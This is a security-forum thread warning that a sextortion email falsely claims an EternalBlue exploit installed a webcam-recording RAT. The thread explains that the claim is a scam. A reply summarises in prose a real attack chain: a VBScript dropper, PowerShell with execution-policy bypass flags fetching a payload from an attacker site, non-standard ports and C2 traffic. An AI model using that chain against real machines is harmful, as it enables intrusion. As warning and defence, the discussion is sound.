Extortion Scam Claims EternalBlue Was Used to Install a Backdoor

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,057
An extortion scam is being distributed that claims a Remote Access Trojan, or RAT, was installed on your computer using the EternalBlue exploit. The scammers then go on to say that they used the RAT to take videos of you on adult web sites and that you must pay a ransom or they will send it to all of your contacts.

EternalBlue is an exploit allegedly created by the NSA that targets a vulnerability in the SMBv1 protocol. This vulnerability allows attackers to execute commands on a vulnerable computer that can be used to install malware.

The extortion emails being distributed have a subject of "Security Alert. Your account was compromised. Password must be changed" and spins a tale that while visiting a porn site, the EternalBlue exploit was triggered to install a Remote Access Trojan on your computer.

This Trojan was then allegedly used to take videos of you, steal your contacts, and your passwords. It goes on to say if you do not pay a $600 extortion demand, the attacker will send your video to all of your contacts.

Extortion Email

Extortion Email

The reality is that this is just a scam and the senders have not utilized any exploits on your computer, there is no RAT installed, and there are no videos of you while using an adult web site. Any passwords or email addresses listed in the email are simply from data breaches where your account info was publicly disclosed.
 

TairikuOkami

Level 35
Verified
Top Poster
Content Creator
Well-known
May 13, 2017
2,453
I love BP news, they always list source articles with tech details, many ways to mitigate it.
Like a firewall, even if it would inject into a allowed process, only TCP 80/443 are usually allowed.
Some DNS services are pretty fast in blocking DNS requests made to C2 servers to slow them down.
this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server
PowerShell (-Executionpolicy bypass - noprofile) obtains a payload from an attacker-controlled website
it downloads a payload via non-standard TCP ports - 1541/45988
it connects to command and control (C2) server
Gh0st RAT uses DNS requests
 
  • Like
Reactions: silversurfer

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top